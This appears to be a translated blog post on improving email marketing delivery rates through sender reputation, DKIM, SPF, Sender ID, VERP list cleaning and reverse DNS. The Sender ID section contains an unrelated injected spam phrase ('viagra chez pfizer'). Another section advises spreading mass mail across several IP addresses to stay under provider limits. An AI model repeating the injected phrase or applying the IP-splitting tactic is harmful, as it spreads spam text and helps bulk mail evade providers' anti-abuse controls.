Email marketing. Increases the rate of messages delivered.

The goal of many of our customers is that messages sent in email marketing campaigns to reach the maximum number of subscribers.

These campaigns are based on sending mass e-mails and Internet service providers (ISP) may block the delivery of these emails to subscribers who are in their networks.

I will focus on certain concepts that may help to improve or increase the rate of message delivery in email marketing campaigns, but also is applicable and desirable, to any server or email system:

Email sender reputation.

83% of the time, reputation is the main factor in order to a message reaches the inbox.

Based on it most of the major email providers like Gmail, Hotmail, …

There are several services that can inform our customers about the reputation of their mail server, so their email marketing campaigns reach the maximum possible núemro subscribers. The most famous is Sender Score.

Signing outgoing messages with DKIM.

DKIM is a filter placed on the mail server that send emails. Dkim adds a signature in the message header, using for this a unique private key for each domain that uses the mail server.

 For its part, the destination mail server (such as Yahoo or Gmail for example) uses a public key, which is obtained from a TXT record of domain DNS zone to authenticate that the message has been sent by the mail server that corresponds origin email address.

It is therefore advisable to give our server (or set of them) of this functionality to get to those subscribers whose mail servers using this filter.

SPF (Sender Policy Framework)

There are email providers who have active this measure in its system to provide them with protection against address spoofing in sending email.

This measure aims to determine which servers are allowed to send messages from a particular domain.

Therefore, the domains used to send messages to subscribers of an email marketing campaign must have activated the measure.

Hotmail Sender ID

Hotmail has its own filter to determine whether to accept the message sent to your mail system or not viagra chez pfizer.

This is Sender ID, which is a program consisting of a cache in which Microsoft adds the SPF record of the domains.

Therefore, if we do not want have problems when sending to Hotmail email marketing campaigns, we must add the SPF record in DNS zone of domains with which we will send messages in campaigns.

Separate sending on different IP addresses

There is mail service providers such as Yahoo, which limits the number of messages sent to its customers from the same ip address.

It is therefore advisable to have multiple mail servers each with a different IP address, or on the same server to create multiple instances of mail service each with an IP address, and limit the number of sendings for each IP address to maintain reputation and that sendings from that address not to be blocked.

Clear the subscribers list of invalid email addresses.

Email providers do not like to send them a repeated messages to email addresses that do not exist or are unavailable.

To resolve any delivery problems arising from the above, many of our customers have used VERP with the MTA installed.

Thus, deliveries to subscribers that have failed are detected and deleted from the list so that you get a healthy list of email marketing campaign and a good reputation of the mail system.

Hostname and Reverse DNS.

Last but not least, the IP address of the mail server that we will use to send messages to an email marketing campaign must have reverse DNS resolution, or what is the same, the server’s IP address must resolve to server name (host name)

Ideally, the reverse DNS resolution of ip adress server must return the hostname of the server. The hostname must be in FQDN format (Fully qualified domain name) and it must respond to the ip of the server.
